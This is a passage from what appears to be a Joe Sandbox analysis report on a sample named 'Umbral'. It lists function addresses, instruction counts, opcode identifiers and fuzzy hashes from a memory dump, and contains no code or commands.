                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52a19a36c118f48957f7bce9001e367562f6ca2dcdabdf786e418ade92b3030c
                                        • Instruction ID: 9ec7023826ebf6da1e1f25f3faaf9efb44a3cb6348d572678e568a5b1f4a8e73
                                        • Opcode Fuzzy Hash: 52a19a36c118f48957f7bce9001e367562f6ca2dcdabdf786e418ade92b3030c
                                        • Instruction Fuzzy Hash: CD216D3071CD099FDA9CEA2CD849A7577E1FBA9350B1001AEE40EC36A6DF25EC468744
                                        Function 00007FF848E72A7A Relevance: .1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71b644fdf0862428a17c1a5d5cb6aab91a2501d3cb2585d8bd3d2982e7a061d3
                                        • Instruction ID: 2137bec4ea59be73b0f23f8170c7a93e6855bad9b4d1e4472f53c7c220eb6948
                                        • Opcode Fuzzy Hash: 71b644fdf0862428a17c1a5d5cb6aab91a2501d3cb2585d8bd3d2982e7a061d3
                                        • Instruction Fuzzy Hash: 8821E13091D7C64FD756E73888148657BE0FF96361B0A41BBE48ACB1A3DF28D801C746
                                        Function 00007FF848E76E6D Relevance: .1, Instructions: 88COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe3683a1393b02bbc99a1a29f695d98d947cffde14780cbb342fc2dbe17b94e9
                                        • Instruction ID: fc2581aa0dfb4f9196fba6d997b7044dde081add64e57391e24113fd85133d92
                                        • Opcode Fuzzy Hash: fe3683a1393b02bbc99a1a29f695d98d947cffde14780cbb342fc2dbe17b94e9
                                        • Instruction Fuzzy Hash: 4F21D43190DA898FD785EBA8C4556EA7BF1FF4A350F0541EAD048CB2A3CB3859068B61
                                        Function 00007FF848E89EE5 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3ce9edf1545203a83c0a5587eeac0c6393cdf8e391cbf63f50aa1d14b5e74d0a
                                        • Instruction ID: 3d592ceb7fa3ff4a6ba051554e1fb49739a92b2b4aff638316f91c147ffd6b38
                                        • Opcode Fuzzy Hash: 3ce9edf1545203a83c0a5587eeac0c6393cdf8e391cbf63f50aa1d14b5e74d0a
                                        • Instruction Fuzzy Hash: C921D8A1D4EA867EE70AB778A4551FD7FA0EF02268F0C91B7D44CCA093EF2814458759
                                        Function 00007FF848E707B8 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f572611004b68322eba817619f8db62cd245880bcdcad700a0906d84448d0482
                                        • Instruction ID: d9fb9c042532876367692d331d3b74c642b39f6b6673bc3b03e679486b255fe5
                                        • Opcode Fuzzy Hash: f572611004b68322eba817619f8db62cd245880bcdcad700a0906d84448d0482
                                        • Instruction Fuzzy Hash: C311D621F1CD5E5FE654F66C545A675A3C2FB4C7A0F1405BAE40DC3296DE24AC414385
                                        Function 00007FF848EC4500 Relevance: .1, Instructions: 82COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8fa36ac78e9cf722d6a5f27448c0098b34c8e9eb6b150e6f379bc67001442e23
                                        • Instruction ID: 9c9d62872e24458e6bcb0a24eb3d330fbef6faea36a537639e3d523ecbe2685d
                                        • Opcode Fuzzy Hash: 8fa36ac78e9cf722d6a5f27448c0098b34c8e9eb6b150e6f379bc67001442e23
                                        • Instruction Fuzzy Hash: 7A11C030A0CA194FFB9CAA08D8497B672D1FB91365F24007EE44EC6182DB36EC83D784
                                        Function 00007FF848E7FAD5 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06698e45ffce1aa28aee78e9588a910bd81d7d0f506527d274356192bf0574b1
                                        • Instruction ID: 3c541fcfee14ad77d9ff752bfa7104a58e681e35d6bb195206f2e9bf8f5e7a2d
                                        • Opcode Fuzzy Hash: 06698e45ffce1aa28aee78e9588a910bd81d7d0f506527d274356192bf0574b1
                                        • Instruction Fuzzy Hash: E321CD22D0C99A4EF7A4B62858222F976D1FF893A0F4401B6DA1CC34C2DF28691A4685
                                        Function 00007FF848E83CF2 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5512e5aff1d6755ddd67f17b54b82a027f535e75c915bb186d01d404fbea21fa
                                        • Instruction ID: ce9b49f70ae02cabf5bcd6ba69f37be874b0c8f594be072ce48606ed0ef56a20
                                        • Opcode Fuzzy Hash: 5512e5aff1d6755ddd67f17b54b82a027f535e75c915bb186d01d404fbea21fa
                                        • Instruction Fuzzy Hash: 9A218E22D0C99A4EF7A5B62CD8152BD7AE1FF45391F8811B6D45CC71C2DF28680A4A85
                                        Function 00007FF848E8144A Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9abc2bf0c6b2ad736f69d2b69295e89e622e20e8ca325895402225d9ad1e06d8
                                        • Instruction ID: 6d3b81c3999055e3c256cea6d0ee5fe03003d2c86e1a78f58efa7befca5f8fb0
                                        • Opcode Fuzzy Hash: 9abc2bf0c6b2ad736f69d2b69295e89e622e20e8ca325895402225d9ad1e06d8
                                        • Instruction Fuzzy Hash: 3E21DE36D0C89E8EFBB8B66858112FD36D1FF853A1F840176D41EC35C2EE3A690A0685
                                        Function 00007FF848E82E42 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85d844d766fe44b69ca3fc1c5f34e5d7c2af8d6b5e8d62dd4f88b0296dd2db7b
                                        • Instruction ID: f96c2fc417753295087c0d2aae989b614d093ac30b839c91d156aed1be7fcab0
                                        • Opcode Fuzzy Hash: 85d844d766fe44b69ca3fc1c5f34e5d7c2af8d6b5e8d62dd4f88b0296dd2db7b
                                        • Instruction Fuzzy Hash: BD21DE36C1C99A4FF7A6B63858152BD7AD0FF46390F8801BAD45CD34D7DF38280A8689
                                        Function 00007FF848E73F65 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 603d7887e34ddd32640200fd809755a12f30f57bbb3da6690379dfd8d06ac4c2
                                        • Instruction ID: 5951a25b136d3316c337256723ba61f6827b29c6565f03266a130e77ff26ecd7
                                        • Opcode Fuzzy Hash: 603d7887e34ddd32640200fd809755a12f30f57bbb3da6690379dfd8d06ac4c2
                                        • Instruction Fuzzy Hash: 4121DF36D1C95E4EF7A4B62858122FD76E1FF8A395F84017AD51CC30C2EF39691A068A
                                        Function 00007FF848E8BAA2 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b41d73fb07ba0b7ba8bb155c8afdd5ec93c2ef0bd68be2e62e48828614d30ad4
                                        • Instruction ID: a7f22e91fa6cc75526f44bb0156354782ac211962547221ced7c67900d838293
                                        • Opcode Fuzzy Hash: b41d73fb07ba0b7ba8bb155c8afdd5ec93c2ef0bd68be2e62e48828614d30ad4
                                        • Instruction Fuzzy Hash: AE21D122D0C99E4EF7A4B66848112FDB7E0FFC53A0F8801B6D45CC7087DF386809468A
                                        Function 00007FF848E853C2 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f55c9227200446d7279066a4499bea0385e9230a03bc156de8cfa135e9b905f2
                                        • Instruction ID: f16d45377ee83f15f9bfa12a7b65b28b219b4d9a95c12776697060ba6f443ef5
                                        • Opcode Fuzzy Hash: f55c9227200446d7279066a4499bea0385e9230a03bc156de8cfa135e9b905f2
                                        • Instruction Fuzzy Hash: 8B21C632D0D9994EF775B32448112BD7AE0FF453A2F8801BAD45EC3493DF38681A4685
                                        Function 00007FF848EBC360 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f266d500e6f7bf84a8d5571c1648db6339afc5fbbaa751000a89436a91a2bbf
                                        • Instruction ID: fd56bf7edbcf21f69feff3bd816599bcd22e1b860b8eb6fba83337485af65132
                                        • Opcode Fuzzy Hash: 7f266d500e6f7bf84a8d5571c1648db6339afc5fbbaa751000a89436a91a2bbf
                                        • Instruction Fuzzy Hash: E611E43191CE851FD74CE61884465BA76D1FBE9350F04507EF08FC32D7DE75A8058246
                                        Function 00007FF848E8A300 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcbcaf56389b980692ab8b3acb4bf71c63fac2655ddd3fb42f07d645703e1986
                                        • Instruction ID: bde89f056bd13ee4bb7ccff115e4532a0e54e00ca659372b967f6292b5b0b890
                                        • Opcode Fuzzy Hash: dcbcaf56389b980692ab8b3acb4bf71c63fac2655ddd3fb42f07d645703e1986
                                        • Instruction Fuzzy Hash: DA216730718E095FDAA8FB2CD458F6573E1FF98740F5141BAE40EC72A6DE21AC808784
                                        Function 00007FF848E7841A Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fcda8df12a673b1ee26838905cb06ec54101d891e1fd16cb3dde33c8a522cc6
                                        • Instruction ID: 2802ac226576de12b78cd151d3387b21aa39eef4835c2a5e2c7c94594014dc9c
                                        • Opcode Fuzzy Hash: 5fcda8df12a673b1ee26838905cb06ec54101d891e1fd16cb3dde33c8a522cc6
                                        • Instruction Fuzzy Hash: 3721B032D0D9AA4DF7B4B22458111B976E0FF653A0F4801BAD45CC2683EF78690B578D
                                        Function 00007FF848E93172 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0aaa4e4310d32a252d36d5bdbdc50b2125226f3d1bfe63b385cf07d344825769
                                        • Instruction ID: a3b38480f22e8d8b95f897178874d7d66b3a00bc284d8c74be8e7958ee85f0bc
                                        • Opcode Fuzzy Hash: 0aaa4e4310d32a252d36d5bdbdc50b2125226f3d1bfe63b385cf07d344825769
                                        • Instruction Fuzzy Hash: 48213531D0C99A0EF7B4B6ACD8152B9B7E0FF84398F4411B6D45CC30A3EF79690A4685
                                        Function 00007FF848E91F22 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73d6f16458a1a0187f9a0034a4475683e48348d3c828f19bf8f48079858e2715
                                        • Instruction ID: d0e17c328616f4349302f05b117acf43304bc590f3166444f739e9702fa04297
                                        • Opcode Fuzzy Hash: 73d6f16458a1a0187f9a0034a4475683e48348d3c828f19bf8f48079858e2715
                                        • Instruction Fuzzy Hash: F621C336D0C99E8EFB64B2A448112B976D1FF453A8F4801FAD45CC71C3DFBD68198685
                                        Function 00007FF848E77C85 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7deb042c68e4fe62924604412eefc920f5c157bda69b18a86f6e2b68001e17e
                                        • Instruction ID: 0fd1f94d89eb7b60bb2f11d679aac32ac661ed0652f939f97e14115659b9b029
                                        • Opcode Fuzzy Hash: b7deb042c68e4fe62924604412eefc920f5c157bda69b18a86f6e2b68001e17e
                                        • Instruction Fuzzy Hash: 9321D63194E6C95FC7429BB48C556ED7FF4EF4B250B0541E7E088C71A3CA2C5946CBA1
                                        Function 00007FF848E84639 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7ddb0ad71382a242e7088768f9fbc54ae1d4ac3024d673df69848e5e621d6444
                                        • Instruction ID: 6df2e75a6c6e860fcd17fcfebf1071957fa4c147a4758925046fa720929d5405
                                        • Opcode Fuzzy Hash: 7ddb0ad71382a242e7088768f9fbc54ae1d4ac3024d673df69848e5e621d6444
                                        • Instruction Fuzzy Hash: 4521F036C0D99E0EF7A5B62848212BD36E0FF45398F8501B6D82CC34C3EF3E68194285
                                        Function 00007FF848E92178 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 060f9c1847eaa82ddde1c3a26070f3760bc92800154139e183e9ad55737d03d8
                                        • Instruction ID: 35dd7494b7afad20ea6abbca890795408c9e7f5b8db93a86fdbf10a5014b0ba6
                                        • Opcode Fuzzy Hash: 060f9c1847eaa82ddde1c3a26070f3760bc92800154139e183e9ad55737d03d8
                                        • Instruction Fuzzy Hash: 0A11C031F18E0A4FD6A8EA2C9454676A3D1FFD4750F14477AC05EC3286DF39E8428784
                                        Function 00007FF848E8A2D8 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68e0f0c7e765652a5733a3fea0c79480806d18e398064570e217058da958ccf6
                                        • Instruction ID: a068bbd0e4cd6f08d0cc4732f400e17e339173f05cab8d0a46f4750bef5ac6cc
                                        • Opcode Fuzzy Hash: 68e0f0c7e765652a5733a3fea0c79480806d18e398064570e217058da958ccf6
                                        • Instruction Fuzzy Hash: 68115132B0CD0A4FE6A8F61DA48877563D1FBE8360F1842B6D40DC7295DE35EC828744
                                        Function 00007FF848E7F2C0 Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba69f21eb6de2fac19a7e6e46773692f310fb2dd0ced27ef4acaf785b0a6404a
                                        • Instruction ID: b799e587b359c69e5d2aa681b4a676be4db6b60fbfb06cada84fcdf823917a16
                                        • Opcode Fuzzy Hash: ba69f21eb6de2fac19a7e6e46773692f310fb2dd0ced27ef4acaf785b0a6404a
                                        • Instruction Fuzzy Hash: 68112511E2CE160EF678712C60952BE23C2FB493E4F50117EE58FC31C7DE2E68024289
                                        Function 00007FF848E76C19 Relevance: .1, Instructions: 73COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 220ef7a1eb77ac35845e08d85638081a934e6b91f65ba4f6622b80993acc9fb4
                                        • Instruction ID: 84be0586426a97fb47f75adaad9063af6fd75ac19d03e1aa76fbc2c0e6f56c63
                                        • Opcode Fuzzy Hash: 220ef7a1eb77ac35845e08d85638081a934e6b91f65ba4f6622b80993acc9fb4
                                        • Instruction Fuzzy Hash: 4A11B122D0DB969FEB91BB7868152603BE0FF5A7C8F1440F6D448CB1A3CB296C198356
                                        Function 00007FF848E86B1B Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 835c72f49bacadf656ba90c7ac2c9d6b386cde1ae22d05f040a07b96fe2240a1
                                        • Instruction ID: 9157d7336260d7c7df17b9b791ea6a94147c7a575759c2727693b293e224f3bc
                                        • Opcode Fuzzy Hash: 835c72f49bacadf656ba90c7ac2c9d6b386cde1ae22d05f040a07b96fe2240a1
                                        • Instruction Fuzzy Hash: 0021382050D6C28FD7066B3458691B83FB1EF03350B2804FEC48AC74A3EB296856C345
                                        Function 00007FF848E76C27 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 458c95eebbdf7affb29ff6d03043032e389444b41c424c3ddaa576f956c12e37
                                        • Instruction ID: 549de3f68982feeb47b4de4c80bdc07a3ace7a989ff9e7937fde778eb7e31ca7
                                        • Opcode Fuzzy Hash: 458c95eebbdf7affb29ff6d03043032e389444b41c424c3ddaa576f956c12e37
                                        • Instruction Fuzzy Hash: 9D11E221D0DA5B8FFA94BB6C28142603BE0FF1A7C8F1400B5D84CC71A2CE262C494256
                                        Function 00007FF848E7F1D8 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c5b7cf640bfe4a891a84743ac25659c06ab5272ee8d6a35ff7da57b7c88cd80
                                        • Instruction ID: e5935da9628f3ea974acdd3b7a06f6b8a216223b841b90080259584768fea90f
                                        • Opcode Fuzzy Hash: 2c5b7cf640bfe4a891a84743ac25659c06ab5272ee8d6a35ff7da57b7c88cd80
                                        • Instruction Fuzzy Hash: 83118B26D1C85E8DFAB4B26858116FE72D1FF893A1F840176D41EC3582EF3A690A0689
                                        Function 00007FF848E927ED Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07e1b9d7bdaf4d70bfb8c300411392535ab4887ca01241cda6a0c42ea5cf51d6
                                        • Instruction ID: b442419ce8c63d4e15423e9168ccd983708a86fba63a76948c65ffd3bb1e1a04
                                        • Opcode Fuzzy Hash: 07e1b9d7bdaf4d70bfb8c300411392535ab4887ca01241cda6a0c42ea5cf51d6
                                        • Instruction Fuzzy Hash: 9E11C221A0C9474FDB99E768941566573E2FFA5384F1540B9D40CC7197DF78D8024384
                                        Function 00007FF848E8C1E8 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 457ad556d6d6f7aa2f048da4bd0485d2ea60b2528ff67ac50d1781fffe293cfb
                                        • Instruction ID: 6c3d3a98a44bf8f2a1e6aa83fe58bb39d9254033ce24a9eb3fdc7256e88f9e15
                                        • Opcode Fuzzy Hash: 457ad556d6d6f7aa2f048da4bd0485d2ea60b2528ff67ac50d1781fffe293cfb
                                        • Instruction Fuzzy Hash: 5E119E30A1CF064FEBB9A638445467972D2FF99740F64457DC00EC2280DF39E886A744
                                        Function 00007FF848E788FD Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2f2187f39ad4606374684e346a2dc769d6d3c8bec9d340e8bbe8c33d1f37ba1
                                        • Instruction ID: 23ab1146d440e8a0843ac1d517553042adfd4536c438b3e0b452754649f52e02
                                        • Opcode Fuzzy Hash: a2f2187f39ad4606374684e346a2dc769d6d3c8bec9d340e8bbe8c33d1f37ba1
                                        • Instruction Fuzzy Hash: 6001F531D0D99E5FE755AB3868580B97FA0FF66741F4401B6D40CC6193EF342A469249
                                        Function 00007FF848E9321C Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5da1f0883097e05805ce8706fb72945ef412cfe86874b7bfbf597a5a23b4ad60
                                        • Instruction ID: 081240a016add5a647bca606eca2f06fb603d3cfaaafd61e4c5705c7300ef40d
                                        • Opcode Fuzzy Hash: 5da1f0883097e05805ce8706fb72945ef412cfe86874b7bfbf597a5a23b4ad60
                                        • Instruction Fuzzy Hash: 8C11E53190DA8D5FEB21AB7898040E97FB0FF56344F0001F7D408CB0A3DA7519158381
                                        Function 00007FF848E7E599 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ba72a636a5abb8cdd9cfd90c44ebfdfabeeca84f8b5e2cc41f1cfd067aa13c4
                                        • Instruction ID: 8adc61d5cb8acf887113e4ecc3e948dbbc1be4f18bdbeaadbe816918a20b3461
                                        • Opcode Fuzzy Hash: 0ba72a636a5abb8cdd9cfd90c44ebfdfabeeca84f8b5e2cc41f1cfd067aa13c4
                                        • Instruction Fuzzy Hash: DD11BF34A0894ECFDB88EF58C894AAA73F2FFA8701F145169D419C7259CB34ED52CB84
                                        Function 00007FF848E93249 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
